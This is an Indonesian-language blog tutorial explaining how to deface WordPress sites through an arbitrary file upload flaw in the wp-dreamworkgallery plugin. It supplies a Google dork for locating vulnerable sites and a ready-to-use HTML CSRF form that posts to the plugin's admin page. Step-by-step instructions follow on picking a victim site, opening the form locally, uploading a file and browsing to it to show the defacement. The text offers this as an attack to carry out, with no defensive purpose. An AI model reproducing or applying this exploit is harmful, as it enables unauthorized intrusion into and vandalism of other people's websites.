Yuhuu Comeback Lagi Bersama Asano.
Yah Dipertemuan Kali Ini Gua Akan Ngasih Tutorial
"Deface Poc Wp Dreamwork Gallery File Upload"
Nah Bagi Yang Penasaran Langsung Saja Simak Baik²
Bahan² Yang Di Perlukan :
- Dork : inurl:/wp-content/plugins/wp-dreamworkgallery
- Csrf : ( Disalin Semuanya Lalu Simpan Dalam Format .html .htm , Biar Mudah Simpan Csrf Di luar Folder Oke :)
<form action="http://target.com/[Part]/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form>
Disalin Coeg, Masih Belum Jelas liat gambar dibawah.
Disalin Terus Di Simpen Jangan Di Buang :v
Terserah Mau Dinamain Apa Yang Penting Berektensi .html .htm .
1. Yah Langsung Dorking Aja Pake Dork Di Atas, Kalo Bisa Dorking Sendiri Biar Dapet Yang Tambah Montok :v
Pilih Salah Satu Web Yang Mau Lu Touch.
2. Nah Ciri² Web Vuln Kalo Lu Buka, Akan Muncul Tulisan .xml
Nah Kaya Gini Gayn, Nah Sekarang Langsung Saja Kita Eksikusi
3. Taruh Disini Targetnya
Dan Jangan Lupa Di Save.
4. Sekarang Buka Csrf Nya, Cara Bukanya Kaya Mana, Tenang
Contoh :
file:///storage/emulated/0/Wp.html ( kalau Di External )
file:///sdcard/Wp.html ( Kalau Di Sdcard)
Gua Simpen Csrf Nya Di Luar Folder, Selanjutnya Terserah Lu Mau Nyimpen Dimana, Yang Penting Bisa Ke Akses.
Pilih File Yang Ingin Lu Upload Terus Tekan "Submit"
5. Kalau Berhasil Di Upload Maka Tampilan Seperti Ini.
Nah Yang Gua Garis Merahin Itu Adalah Exploitnya Jangan Lupa Disalin, Untuk Di Tarus Di Url.
Cara Akses Nya Gimana Sabar Dan Tenang.
Contoh Punya Gua :
www.target.com/wp-content/uploads/dreamwork/14397_uploadfolder/big/Xtz.html
6. Dan Lihat Hasilnya
Mantap Kan, Oke Mungkin Segitu Aja Dari Gua, Gua Asano Bye Bye See You Next Time :)
